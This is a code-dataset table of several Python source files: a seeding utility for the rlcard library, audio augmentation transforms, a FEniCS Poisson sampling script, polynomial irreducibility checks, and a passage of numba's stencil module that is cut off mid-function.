repo_name | repo_path | repo_head_hexsha | content | apis
---|---|---|---|---|
AdrianP-/rlcard | rlcard/utils/seeding.py | 5b99dc8faa4c97ecac2d1189967b90c45d79624b | #The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import hashlib
import numpy as np
import os
import struct
color2num = dict(gray=30, red=31, green=32, yellow=33, blue=34, magenta=35,
                 cyan=36, white=37, crimson=38)  # ANSI color codes used by colorize
def colorize(string, color, bold=False, highlight=False):
"""Return string surrounded by appropriate terminal color codes to
print colorized text. Valid colors: gray, red, green, yellow,
blue, magenta, cyan, white, crimson
"""
attr = []
num = color2num[color]
if highlight: num += 10
attr.append(str(num))
if bold: attr.append('1')
attrs = ';'.join(attr)
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def error(msg, *args):
print(colorize('%s: %s'%('ERROR', msg % args), 'red'))
def np_random(seed=None):
if seed is not None and not (isinstance(seed, int) and 0 <= seed):
        raise ValueError('Seed must be a non-negative integer or omitted, not {}'.format(seed))
seed = create_seed(seed)
rng = np.random.RandomState()
rng.seed(_int_list_from_bigint(hash_seed(seed)))
return rng, seed
def hash_seed(seed=None, max_bytes=8):
"""Any given evaluation is likely to have many PRNG's active at
once. (Most commonly, because the environment is running in
multiple processes.) There's literature indicating that having
    linear correlations between seeds of multiple PRNGs can correlate
the outputs:
http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
http://dl.acm.org/citation.cfm?id=1276928
Thus, for sanity we hash the seeds before using them. (This scheme
is likely not crypto-strength, but it should be good enough to get
rid of simple correlations.)
Args:
seed (Optional[int]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the hashed seed.
"""
if seed is None:
seed = create_seed(max_bytes=max_bytes)
hash = hashlib.sha512(str(seed).encode('utf8')).digest()
return _bigint_from_bytes(hash[:max_bytes])
def create_seed(a=None, max_bytes=8):
"""Create a strong random seed. Otherwise, Python 2 would seed using
the system time, which might be non-robust especially in the
presence of concurrency.
Args:
a (Optional[int, str]): None seeds from an operating system specific randomness source.
max_bytes: Maximum number of bytes to use in the seed.
"""
# Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
if a is None:
a = _bigint_from_bytes(os.urandom(max_bytes))
elif isinstance(a, str):
a = a.encode('utf8')
a += hashlib.sha512(a).digest()
a = _bigint_from_bytes(a[:max_bytes])
elif isinstance(a, int):
a = a % 2**(8 * max_bytes)
else:
        raise ValueError('Invalid type for seed: {} ({})'.format(type(a), a))
return a
# TODO: don't hardcode sizeof_int here
def _bigint_from_bytes(bytes):
sizeof_int = 4
padding = sizeof_int - len(bytes) % sizeof_int
bytes += b'\0' * padding
int_count = int(len(bytes) / sizeof_int)
unpacked = struct.unpack("{}I".format(int_count), bytes)
accum = 0
for i, val in enumerate(unpacked):
accum += 2 ** (sizeof_int * 8 * i) * val
return accum
def _int_list_from_bigint(bigint):
# Special case 0
if bigint < 0:
        raise ValueError('Seed must be non-negative, not {}'.format(bigint))
elif bigint == 0:
return [0]
ints = []
while bigint > 0:
bigint, mod = divmod(bigint, 2 ** 32)
ints.append(mod)
return ints
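# Illustrative usage sketch (added for clarity, not part of the original module).
# It only exercises the helpers defined above; the seed value 42 is arbitrary.
if __name__ == "__main__":
    rng_a, used_seed = np_random(42)
    rng_b, _ = np_random(used_seed)
    # Both generators go through the same hash-then-seed path, so their
    # streams are identical.
    assert rng_a.randint(0, 100) == rng_b.randint(0, 100)
    # Nearby integer seeds are hashed to unrelated values before seeding.
    print("hash_seed(7) =", hash_seed(7), "hash_seed(8) =", hash_seed(8))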
| [((39, 10, 39, 33), 'numpy.random.RandomState', 'np.random.RandomState', ({}, {}), '()', True, 'import numpy as np\n'), ((78, 31, 78, 52), 'os.urandom', 'os.urandom', ({(78, 42, 78, 51): 'max_bytes'}, {}), '(max_bytes)', False, 'import os\n'), ((81, 13, 81, 30), 'hashlib.sha512', 'hashlib.sha512', ({(81, 28, 81, 29): 'a'}, {}), '(a)', False, 'import hashlib\n')] |
ex4sperans/freesound-classification | ops/transforms.py | 71b9920ce0ae376aa7f1a3a2943f0f92f4820813 | import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
        return transform(dataset, **inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
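# Illustrative pipeline sketch (added for clarity, not part of the original module).
# The two-class map and the feature descriptor below are hypothetical; real values
# come from the dataset metadata and the training configuration.
if __name__ == "__main__":
    demo_pipeline = Compose([
        LoadAudio(),
        MapLabels(class_map={"Bark": 0, "Meow": 1}),
        MixUp(p=0.5),
        AudioFeatures("mel_2048_512_64"),
        DropFields(("filename", "sr")),
    ])
    # For validation, the stochastic Augmentation transforms can be switched
    # off in place without rebuilding the pipeline.
    demo_pipeline.switch_off_augmentations()
    # Running the pipeline would additionally need a real audio file and, for
    # MixUp, a dataset object (both names here are hypothetical), e.g.
    # demo_pipeline(dataset=some_dataset, filename="clip.wav", raw_labels=["Bark"])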
class Identity:
def __call__(self, dataset=None, **inputs):
return inputs | [((119, 20, 119, 50), 'ops.audio.read_audio', 'read_audio', ({(119, 31, 119, 49): "inputs['filename']"}, {}), "(inputs['filename'])", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((139, 15, 142, 25), 'ops.audio.compute_stft', 'compute_stft', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((145, 30, 145, 48), 'numpy.transpose', 'np.transpose', ({(145, 43, 145, 47): 'stft'}, {}), '(stft)', True, 'import numpy as np\n'), ((320, 20, 320, 50), 'random.choice', 'random.choice', ({(320, 34, 320, 49): 'self.transforms'}, {}), '(self.transforms)', False, 'import random\n'), ((54, 11, 54, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((57, 36, 60, 13), 'ops.audio.mix_audio_and_labels', 'mix_audio_and_labels', ({(58, 16, 58, 27): 'first_audio', (58, 29, 58, 51): "random_sample['audio']", (59, 16, 59, 28): 'first_labels', (59, 30, 59, 53): "random_sample['labels']"}, {}), "(first_audio, random_sample['audio'], first_labels,\n random_sample['labels'])", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((78, 11, 78, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((79, 35, 79, 61), 'numpy.flipud', 'np.flipud', ({(79, 45, 79, 60): "inputs['audio']"}, {}), "(inputs['audio'])", True, 'import numpy as np\n'), ((94, 11, 94, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((218, 36, 218, 71), 'numpy.expand_dims', 'np.expand_dims', ({(218, 51, 218, 66): "inputs['audio']", (218, 68, 218, 70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((247, 11, 247, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((250, 20, 250, 70), 'numpy.random.randint', 'np.random.randint', ({(250, 38, 250, 69): 'original_size - target_size - 1'}, {}), '(original_size - target_size - 1)', True, 'import numpy as np\n'), ((267, 11, 267, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((268, 35, 269, 78), 'ops.audio.shuffle_audio', 'shuffle_audio', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((285, 11, 285, 30), 'numpy.random.uniform', 'np.random.uniform', ({}, {}), '()', True, 'import numpy as np\n'), ((286, 35, 287, 48), 'ops.audio.cutout', 'cutout', ({(287, 16, 287, 36): "transformed['audio']", (287, 38, 287, 47): 'self.area'}, {}), "(transformed['audio'], self.area)", False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((306, 20, 306, 75), 'numpy.random.randint', 'np.random.randint', ({(306, 38, 306, 39): '0', (306, 41, 306, 74): "inputs['audio'].size - max_length"}, {}), "(0, inputs['audio'].size - max_length)", True, 'import numpy as np\n'), ((104, 23, 104, 47), 'random.uniform', 'random.uniform', ({(104, 38, 104, 41): '0.9', (104, 43, 104, 46): '1.1'}, {}), '(0.9, 1.1)', False, 'import random\n'), ((222, 19, 226, 13), 'ops.audio.compute_stft', 'compute_stft', (), '', False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((228, 36, 228, 71), 'numpy.expand_dims', 'np.expand_dims', ({(228, 51, 228, 66): "inputs['audio']", (228, 68, 228, 
70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((231, 36, 231, 71), 'numpy.expand_dims', 'np.expand_dims', ({(231, 51, 231, 66): "inputs['audio']", (231, 68, 231, 70): '-1'}, {}), "(inputs['audio'], -1)", True, 'import numpy as np\n'), ((249, 30, 249, 67), 'numpy.random.uniform', 'np.random.uniform', ({(249, 48, 249, 56): 'self.min', (249, 58, 249, 66): 'self.max'}, {}), '(self.min, self.max)', True, 'import numpy as np\n'), ((103, 32, 103, 55), 'random.randrange', 'random.randrange', ({(103, 49, 103, 50): '2', (103, 52, 103, 54): '10'}, {}), '(2, 10)', False, 'import random\n'), ((102, 29, 102, 56), 'random.randrange', 'random.randrange', ({(102, 46, 102, 50): '-300', (102, 52, 102, 55): '300'}, {}), '(-300, 300)', False, 'import random\n'), ((96, 16, 96, 43), 'pysndfx.AudioEffectsChain', 'pysndfx.AudioEffectsChain', ({}, {}), '()', False, 'import pysndfx\n'), ((98, 33, 98, 53), 'random.randrange', 'random.randrange', ({(98, 50, 98, 52): '50'}, {}), '(50)', False, 'import random\n'), ((99, 31, 99, 51), 'random.randrange', 'random.randrange', ({(99, 48, 99, 50): '50'}, {}), '(50)', False, 'import random\n'), ((100, 33, 100, 53), 'random.randrange', 'random.randrange', ({(100, 50, 100, 52): '50'}, {}), '(50)', False, 'import random\n')] |
mathematicalmichael/thesis | figures/pp.py | 2906b10f94960c3e75bdb48e5b8b583f59b9441e | #!/usr/bin/env python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point
mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40) # ERROR=40
# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()
if __name__=='__main__':
import argparse
parser = argparse.ArgumentParser(description="Poisson Problem")
parser.add_argument('-n', '--num', default = 10, type=int,
help="Number of samples")
parser.add_argument('-o', '--outfile', default='results',
help="Output filename (no extension)")
parser.add_argument('-i', '--input-dim', default=1, type=int)
parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)')
args = parser.parse_args()
num_samples = args.num
dist = args.dist
outfile = args.outfile.replace('.pkl','')
inputdim = args.input_dim
if inputdim == 1: # U[1,5]
randsamples = 1 + 4*np.random.rand(num_samples)
    else: # multi-dimensional input: N(0,1) or scaled uniform, depending on --dist
if dist == 'n':
randsamples = np.random.randn(num_samples, inputdim)
elif dist == 'u':
randsamples = -4*np.random.rand(num_samples, inputdim)
else:
raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")
sample_seed_list = list(zip(range(num_samples), randsamples))
def wrapper(sample, outfile):
g=sample[1]
u = poisson(gamma=g, mesh=mesh)
# Save solution
fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
File(fname, 'w') << u
return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}
results = []
for sample in sample_seed_list:
r = wrapper(sample, outfile)
results.append(r)
# print(results)
import pickle
pickle.dump(results, open(f'{outfile}.pkl','wb'))
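    # Added sanity-check sketch (not part of the original script): re-load the
    # pickle that was just written and report how many samples made it to disk.
    with open(f'{outfile}.pkl', 'rb') as fh:
        reloaded = pickle.load(fh)
    print(f"wrote {len(reloaded)} samples to {outfile}.pkl")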
| [((11, 0, 11, 17), 'fenics.set_log_level', 'set_log_level', ({(11, 14, 11, 16): '(40)'}, {}), '(40)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((8, 21, 8, 31), 'fenics.Point', 'Point', ({(8, 27, 8, 28): '0', (8, 29, 8, 30): '0'}, {}), '(0, 0)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((8, 33, 8, 43), 'fenics.Point', 'Point', ({(8, 39, 8, 40): '1', (8, 41, 8, 42): '1'}, {}), '(1, 1)', False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((20, 13, 20, 67), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((47, 12, 47, 39), 'newpoisson.poisson', 'poisson', (), '', False, 'from newpoisson import poisson\n'), ((37, 26, 37, 64), 'numpy.random.randn', 'np.random.randn', ({(37, 42, 37, 53): 'num_samples', (37, 55, 37, 63): 'inputdim'}, {}), '(num_samples, inputdim)', True, 'import numpy as np\n'), ((50, 8, 50, 24), 'fenics.File', 'File', ({(50, 13, 50, 18): 'fname', (50, 20, 50, 23): '"""w"""'}, {}), "(fname, 'w')", False, 'from fenics import set_log_level, File, RectangleMesh, Point\n'), ((34, 28, 34, 55), 'numpy.random.rand', 'np.random.rand', ({(34, 43, 34, 54): 'num_samples'}, {}), '(num_samples)', True, 'import numpy as np\n'), ((39, 29, 39, 66), 'numpy.random.rand', 'np.random.rand', ({(39, 44, 39, 55): 'num_samples', (39, 57, 39, 65): 'inputdim'}, {}), '(num_samples, inputdim)', True, 'import numpy as np\n')] |
kluhan/seraphim | additions/irreducible_check.py | 412b693effb15f80d348d6d885d7c781774bb8aa | """
Irreducibility criteria
Implemented are the Eisenstein and the Perron criterion
Sources:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Polynomials of type Polynomial are passed in, not plain lists of coefficients
"""
import logging
import helper
import itertools
def factor(n):
    # Factorization of a number n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
    # Prime factorization of a number n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# recursive implementation of HCF (highest common factor)
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
    ]  # zeros would distort the result of HCF
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Source: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
    Tests a polynomial for irreducibility (Perron).
    A leading coefficient != 1 does not work.
    No statement is possible if the second-highest coefficient is smaller than the absolute sum of the remaining coefficients
"""
if polynomial.degree() < 0:
        return logging.error("Invalid polynomial")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
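# Worked example for the Perron criterion above (added illustration, assuming the
# external Polynomial type used throughout this module): for
# p(x) = x^3 + 5x^2 + 2x + 1 the second-highest coefficient satisfies
# 5 > 1 + |2| + |1| = 4, so the criterion applies and the polynomial is
# irreducible over Q; is_irreducible_perron returns 1 for it.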
# Sources: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
    An implementation of the Eisenstein criterion.
"""
    # The polynomial must have a degree m >= 1
if polynomial.degree() < 1:
return 2
    # Eisenstein requires coprime coefficients
    if not helper.is_polynomial_coprime(polynomial):
return 2
    # Check whether there is a prime that divides all coefficients of the polynomial up to degree m - 1. p^2 must not divide a0
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
    # Get the prime factorization of the constant term to obtain a base set of primes
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
        ):  # if p^2 divides the constant coefficient, no statement can be made
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
                return 2  # if the prime does not divide the coefficient, no statement can be made
return 1
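# Worked example for the Eisenstein criterion above (added illustration): for
# p(x) = x^3 + 2x^2 + 2x + 2 and the prime p = 2, 2 divides the coefficients
# 2, 2 and 2, 2 does not divide the leading coefficient 1, and 2^2 = 4 does
# not divide the constant term 2, so Eisenstein applies and the polynomial is
# irreducible over Q.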
| [((60, 16, 60, 62), 'itertools.combinations', 'itertools.combinations', ({(60, 39, 60, 58): 'non_zero_polynomial', (60, 60, 60, 61): '(2)'}, {}), '(non_zero_polynomial, 2)', False, 'import itertools\n'), ((109, 7, 109, 56), 'helper.is_polynomial_coprime', 'helper.is_polynomial_coprime', ({(109, 36, 109, 55): '(polynomial is False)'}, {}), '(polynomial is False)', False, 'import helper\n'), ((119, 20, 119, 52), 'helper.prime_factor', 'helper.prime_factor', ({(119, 40, 119, 51): 'const_coeff'}, {}), '(const_coeff)', False, 'import helper\n'), ((75, 15, 75, 49), 'logging.error', 'logging.error', ({(75, 29, 75, 48): '"""Polynom ungültig"""'}, {}), "('Polynom ungültig')", False, 'import logging\n')] |
auderson/numba | numba/stencils/stencil.py | 3d67c9850ab56457f418cf40af6245fd9c337705 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
